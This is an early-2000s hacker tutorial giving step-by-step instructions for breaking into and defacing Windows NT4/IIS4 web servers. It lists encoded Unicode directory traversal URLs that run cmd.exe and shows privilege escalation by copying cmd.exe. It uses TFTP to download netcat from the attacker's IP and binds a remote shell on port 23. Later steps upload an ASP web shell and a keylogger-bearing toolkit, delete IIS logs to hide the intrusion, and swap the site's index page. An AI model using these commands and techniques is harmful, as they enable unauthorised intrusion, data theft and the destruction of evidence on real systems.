Tutorial - NT4/IIS4 Dface Step-by-Step Version - 1.1 Compiled by - DoX (aka razka and eXist) Email - dimspyder@hushmail.com Date - 6/6/01 (Updated 1/6/02) ======================================== First off you need to find a site you want to tag that is running Windows NT4 with IIS/4.0. To do this, compile a list of sites that exist with neat, unique domain names, or just generic ones, doesn't really matter much. Now, get on over to http://uptime.netcraft.com and over on the left there is a little window that says, "What's that site running?". You plug in the domain without the http:// and then if your lucky you will see: The site www.****.com is running Microsoft-IIS/4.0 on NT4/Windows 98. Next step is seeing if it has any possibility of being vulnerable to any number of attacks. There are so many different ways to gain access to a NT4/IIS4 box, but I will only cover the main ways that I am currently exploiting. That is the "Microsoft IIS and PWS Extended Unicode Directory Traversal Vulnerability" and the "Microsoft IIS Executable File Parsing Vulnerability" which are fully explained at www.securityfocus.com. Now is time to load up your browser with an anonymous proxy server to hide your IP Address from the w3svc logs. Proxy lists are available at (http://www.multiproxy.org) and you can test your proxy by visiting this site (http://www.stilllistener.addr.com/checkpoint1/index.shtml). Next you will take the URL of the site you wish to tag and place these dir extensions after the full domain name looking for an HTTP Error 403 (403.2 Forbidden: Read Access Forbidden): /cgi-bin/ /iisadmpwd/ /scripts/ /msadc/ /_vti_bin/ /_vti_cnf/ /_vti_pvt/ That will tell you what Unicode exploit will most likely work with that site (NOTE: These will not always work, depending on if the NT4 server is up to date with its patches). If it shows up for www.bitchbox.com/cgi-bin/ then use this exploit (which is hexed to evade most IDS that may be on the box, as are the rest I'm about to show): www.bitchbox.com/cgi-bin/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0% af%2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/ c+dir+c:\ If it shows up for www.bitchbox.com/iisadmpwd/ then use this exploit: www.bitchbox.com/iisadmpwd/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6 e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\ If it shows up for www.bitchbox.com/scripts/ then use this exploit: www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\ If it shows up for www.bitchbox.com/msadc/ then use this exploit: www.bitchbox.com/msadc/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af %2e%2e/%77%69%6e%6e%74/%73%79%73%74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+ dir+c:\ If it shows up for www.bitchbox.com/_vti_bin/ then use this exploit: www.bitchbox.com/_vti_bin/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0 %af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73 %74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\ If it shows up for www.bitchbox.com/_vti_cnf/ then use this exploit: www.bitchbox.com/_vti_cnf/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0 %af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73 %74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\ If it shows up for www.bitchbox.com/_vti_pvt/ then use this exploit: www.bitchbox.com/_vti_pvt/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0 %af%2e%2e/%2e%2e%c0%af%2e%2e/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73 %74%65%6d%33%32/%63%6d%64%2e%65%78%65?/c+dir+c:\ These all invoke cmd.exe from the path: %systemroot%\winnt\system32\cmd.exe and run the directory (dir) command to display the contents of the c:\ (NOTE: This can be changed to any drive letter and still display properly). The dir command can also be exchanged with almost any other DOS command and still work. The most common commands I am forced to use with this are the dir (directory), type (displays the contents of files), and del (delete). Now once I gain access to the directory information, I usually snoop around some. First I check for logs with this command: dir c:\*.log /S <----- (placed at the end of the Unicode string would be: /c+dir+c:\*.log+/S with the spaces replaced with "+"). This can be substituted for c:\ through z:\ and still work properly as long as a drive exists there. The log files you are looking for usually reside in %systemroot%\winnt\system32\logfiles\, %webroot%\logfiles\, or any variation of those two (NOTE: This is not always the case. I have found log files on an obscure drive letter such as g:\ and also have found them in other strange places. That is why I do the directory search for *.log to find EVERY log on that drive). Once you find the correct logs which are usually in the sub-directory of %systemroot%\winnt\system32\logfiles\w3svc*\ then check the dates for them and see how often they rollover (NOTE: Most rollover at 12 Midnight, but once again, there are always exceptions). This is useful information later on when you actually get your own IP Address involved. So far you should have been using a proxy server to hide your IP Address so there is little reason to worry about this yet. The best way to tell which w3svc directory the logs reside in for the computer you are accessing is to use the command "type" on the log files (which will display the contents of them). The syntax for that command would be (only an example): type c:\winnt\system32\logfiles\w3svc4\ex010606.log (once again when used with Unicode replace space with "+") ex010606.log is the log for the date of 06/06/01 and while it is in use (being written to by the w3svc), it cannot be deleted. This will come more into play later when I explain how to delete the logs. The output for the following command will look like this (only an example): #Software: Microsoft Internet Information Server 4.0 #Version: 1.0 #Date: 2001-06-06 00:00:09 #Fields: date time c-ip cs-username s-sitename s-computername s-ip cs-method cs-uri-stem cs-uri-query sc-status cs-win32-status sc-bytes cs-bytes time-taken s-port cs-version cs(User-Agent) cs(Cookie) cs(Referer) 2001-06-06 00:00:09 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD /html/goals/tsld001.htm - 200 0 245 175 0 80 HTTP/1.1 Gulliver/1.3 - - 2001-06-06 00:00:18 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD /html/vol103.htm - 200 0 247 172 0 80 HTTP/1.1 Gulliver/1.3 - - 2001-06-06 00:01:10 208.219.77.29 - W3SVC4 NEWTON 207.136.232.43 HEAD /html/goals/tsld002.htm - 200 0 246 175 0 80 HTTP/1.1 Gulliver/1.3 - - By reading the headers you should see that the first IP Addresses that are shown in the line is the person whom is accessing the site and the second is the from the machine you are currently trying to exploit. In it, in plain text, is the directory you were accessing along with a lot of other useful information to anyone trying to find out more about what you were doing on their box. Once you gain a more interactive "command shell" then you will be able to rid of the evidence in the logs. This topic will be re-introduced later on. ======================================== Enough of the bullshit, time for the real parts... ======================================== OK, now you need a new instance of command copied from the original (which is at %systemroot%\winnt\system32\cmd.exe), which will usually give you higher privileges than previously available with the original instance. This is because cmd.exe adheres to the privileges of its residual directory (thus the escalation of sorts) when it is moved to another directory with higher privileges and is called upon to execute commands. You will need to copy the new instance of cmd.exe to any number of other directories (such as %webroot%\scripts\ or %systemroot%\progra~1\common~1\system\msadc\). This is done with the following Unicode string if the /scripts/ directory was vulnerable to attack and it was hosted on the c:\ (different for each site): www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/winnt/system32/cmd.exe?/c+copy+c:\winn t\system32\cmd.exe+c:\inetpub\scripts\cmd1.exe This would place the new command instance (cmd1.exe) in the c:\inetpub\scripts\ directory and would allow you to access it to run commands or programs from: www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/inetpub/scripts/cmd1.exe?/c+dir+c:\ Once you have snooped around on the box enough to decide whether it is susceptible to attack and whether it is even worth it, then you must upload your tools. There are 2 main ways to do this. The first way I will tell you, I do not use because it is unstable and there are easier ways to do the same thing. But here goes anyways... TFTP will be the first. This can easily be done via your web browser using a Unicode string similar to the ones previously shown (once again calling cmd.exe [cmd1.exe this time] and executing a program). The program you execute is tftp.exe that is included default in all NT4 installs, and resides in this path %systemroot%\winnt\system32\tftp.exe. To run this you would use the Unicode string that works for the site you are trying to 0wn (e.g. the /scripts/ or /msadc/ one, or any other for that matter). First you will need to get a TFTP daemon to run on your own computer to accept connections from the bitch box. Go to your nearest local TFTPD.exe dealer and grab one at the low price of....ah who gives a fuck, just go find one to download (http://www.download.com and search for "tftpd"). The following example is the string you would use to get netcat on the bitch box using TFTP remotely if the /scripts/ directory was vulnerable to attack and it was hosted on the c:\ (Remember: different for each site and have your tftp daemon running!!!): www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/winnt/system32/tftp.exe+"-i"+xxx.xxx.x xx.xxx+GET+c:\rootkit\ncx99.exe+c:\winnt\system32\ncx99.exe Substitute the xxx.xxx.xxx.xxx with your own IP Address, change the first directory to the one that netcat is residing in on your local computer, and change the last directory to whatever directory you want netcat to be uploaded to. Once it is uploaded you would run it by this Unicode string: www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/winnt/system32/cmd.exe?/c+c:\winnt\sys tem32\ncx99.exe+-L+-p+23+-t+-e+cmd1.exe <---(use the correct netcat syntax for your current situation). The syntax above will make netcat listen from the bitch box on port 23 (telnet default) and when it gets connected to by a client it will spawn a shell (cmd1.exe which has escalated privileges). The -t option tells Netcat to handle any telnet negotiation the client might expect. The -L (note the capital L) option will restart Netcat with the same command line when the connection is terminated. This way you can connect over and over to the same Netcat process. The -p option just tells netcat to listen on the port number following (23 in this case) and the -e option is to execute the program that follows in the syntax (cmd1.exe in this case). After you're on netcat you can do whatever it is you want, but I'm not going to bother explaining the rest. Should make sense and if it doesn't then just go get a copy of netcat from somewhere and read the readme.txt file included because I don't feel like explaining that. I'm more interested and active in the upcoming section's information anyways, because it allows the whole attack to be conducted via your web browser (Many people find this lame, but I found it interesting how one could 0wn a box all from their web browser). ======================================== Now to the REAL good shit.... ======================================== First you will have to get a Perl script called uploader.pl (I use a an old modified one called bewm.pl). The only modifications to this old uploader.pl script were done by b1t. He changed the original code to have more strings and also hexed them to evade IDS. The uploader.pl source needs to be edited depending on the box's vulnerable directory you wish to exploit. In the source there are the 7 main vulnerable directories that I mentioned previously, and depending on which the bitch box is vulnerable to, that one should be placed on the top above the other. If you have the uploader.pl then you will know what I'm talking about, and if you don't, then that's too bad. GO FIND ONE. OK, now I'm not going to explain how the upload.pl works (look at the source if you want to know, its rather simple), but I will give you general information. When run, it asks for the bitch box's IP Address and port, and also asks for the %webroot% to upload files to. This is where you remember which directory was vulnerable and gave you an HTTP Error 403 (403.2 Forbidden: Read Access Forbidden). That is the directory you will enter in as the %webroot% when prompted. The script uses the Unicode string that the vulnerable box is susceptible to (the one you placed at the top of the list), and it makes a copy of cmd.exe from %systemroot%\winnt\system32\cmd.exe and places it in the vulnerable directory (such as %webroot%\scripts\ or %systemroot%\progra~1\common~1\system\msadc\) with the name bewm.exe. Then the script tries to upload 2 important files to the bitch box that must be located in the same directory as the uploader.pl for it to work. The 2 files are bewm.inc and bewm.asp which both come with the bewm.pl "package" (with different names originally of course). If the upload of these 2 files is successful to the %webroot% that you specified then the script will complete and exit. Now to get access to the 2 uploaded file. They both need to be in the same directory to work (which they are unless you move them around) and they must be in a directory that has the "execute scripts and executables" permission enabled. The %systemroot%\progra~1\common~1\system\msadc\ and %webroot%\scripts\ directories both have that enabled by default, so they should be the first you try. If you uploaded them to one of those directories already then just plug www.bitchbox.com/msadc/bewm.asp or www.bitchbox.com/scripts/bewm.asp into your browser and you will see one of my favorite sites to see, a browse and upload page. If it doesn't work from that directory then move them around with Unicode strings in your browser (different for each box): www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/c+copy+c:\inetpub\scripts\bewm.asp+c:\ inetpub\wwwroot\cgi-bin\bewm.asp Don't forget the bewm.inc (the heart of your new upload page): www.bitchbox.com/scripts/%2e%2e%c0%af%2e%2e/%77%69%6e%6e%74/%73%79%73%74% 65%6d%33%32/%63%6d%64%2e%65%78%65?/c+copy+c:\inetpub\scripts\bewm.inc+c:\ inetpub\wwwroot\cgi-bin\bewm.inc Well if you can't figure out this shit then your fucked because your IP Address is all in the w3svc logs and you don't have an upload page to upload your tools!!!! If this happens to you it is best to wait for a day or so and check back at the box using Unicode strings to delete the logs. Remember I told you they would usually rollover every 24 hours. Well here is hoping they do, because sometimes they don't rollover for a week or a month. It all depends on the box. That is why I snoop around before I commit to the box. Once you run the bewm.pl script on the box, your IP Address is in the logs and nothing you can do about it. Before that time you should of hopefully been using a Proxy to hide your IP Address from the logs. OK, lets say you were successful and were able to access your bewm.asp page, fine, great, yay.... now comes the fun part. This is where you get to browse the contents of your computer via your browser using the bewm.asp and upload ANY file you want to the bitch box. All the uploaded files will be placed in the same directory the bewm.asp and bewm.inc are in. I usually upload my whole NT4 "rootkit" to the bitch box. You never know what you might need to use on it, so it's best to have everything you would ever need (plus it's less than 500KB). The files I upload are: fport.exe - Reports all open TCP/IP and UDP ports and maps them to the owning application (124KB). fscan.exe - Very fast command line port scanner to launch from the bitch box (16.5KB). fpipe.exe - Command line port redirector (11KB). icmd.exe - Very small telnet server (36KB). klogger.exe - Very small key logger (32KB). ncx99.exe - NT version of Netcat (58KB). whoami.exe - Displays your user credentials (65KB). tlist.exe - Displays all currently running processes (39.7KB). kill.exe - Kills any running process by their PID number (34.7KB). cmd.asp - An interactive command prompt from an ASP file that escalates your privileges to NT AUTHORITY\SYSTEM (aprox. 1KB). Total size - 417.9KB You will have to find these files on your own, they are available at www.foundstone.com, www.securityfocus.com, www.dogmile.com and a few other places. Once these are up, use your browser (with a proxy) to visit the cmd.asp page which should be in the same dir that the bewm.asp is (different for each box): www.proxy.com/www.bitchbox.com/scripts/cmd.asp The two main proxies that I use to do this are https://www.secureweb.com/ and http://anon.free.anonymizer.com/, by just placing the web address you want to visit ahead of those URLs like shows above. To run commands from your new cmd.asp page, you just enter them in like it was a command shell, using the full path of a .exe to execute it (e.g. - c:\inetpub\scripts\tlist.exe). Once you figure out how to get that page up then the first thing you should do is use whoami.exe and see if your user credentials are NT AUTHORITY\SYSTEM, if not then either you fucked up or the web administrator did not install IIS/4.0 with the default options enabled. If you do have the escalated privileges then use tlist.exe and view all running processes, looking for daemons, loggers, or any other interesting processes (like PC Anywhere). If there are any that you do not want running, then use kill.exe with the PID number following to kill that process. Next you will hopefully recall the directory the logfiles were in that you MUST delete before the administrator notices something is strange and investigates them for hax0rz. If you do not wish to wait for the logs to flip to delete them, then you just use the "date" command to change the date on the bitch box which causes the logs to roll-over once a web page is accessed. The command you would use to change the date is: date 02-02-98 Then you would access the main page with a proxy causing the logs to rollover. Then you are able to "dir" to the directory they are in and delete them at your will. Remember if you are doing this during the day, the administrator may hear the disk drives spin when you delete a huge amount of logs. I usually try to just delete the ones from the day I was on or I wait until it is night and delete them all. Make sure you check all the directories that the logs may be in, just like I showed you earlier, by doing this command for each existing directory (C:\ - Z:\, yes sometimes there is a Z:\ with log files that were hidden there for the exact reason of nobody thinking to check there): dir c:\*.log /S And if your feeling super nice and want to free up some space for the web administrator (sometimes over a gig of logs), then just use this command for each existing directory: del c:\*.log /S Might take a while or even hang the cmd.asp page up if you are using that way to execute these commands. If that occurs then just reload the page and try again. Be sure to tracert the bitch box to see what country and time zone they are in before you do all this. Now that the logs are cleared and all your tools are on the bitch box, it is officially "BITCHED". Now you have free reign over the whole box and can execute any command you wish via a number of different ways (cmd.asp, ncx99.exe, or icmd.exe). If you wish you may now make an HTML page with some pictures and upload them to the bitch box via bewm.asp and then use the cmd.asp page to move them over to the %webroot%. Just rename the index.htm/asp or default.htm/asp to anything you want and rename yours to the original name. Simple as that. Make sure the paths in the source of your web page actually point to the pictures (I suggest moving them all to the %webroot% directory and just use this tag in the source: As long as they are in same directory it will show up on the page. But I usually wait a week or so before tagging the box so that I have the chance to mess around with my tools and experiment a little. Who knows what you will find on them, maybe some nice CC# databases or a whole pr0n directory, but just remember to have fun, and ALWAYS EXPECT THE UNEXPECTED!!! ========================================= Denial of eXistence 2k+1 ========================================= Greets: cbb, b1t, daemonx, AhnuNahki, skitch, Archim3DES1, obzerve, blachz, The-Rev, orbit43, ezs, nu|L, {swat}, joe, tri0, Teck7, dustin, dgram, Tormented Box, 0xff, Trippin' Smurfs, Fux0r Inc. =========================================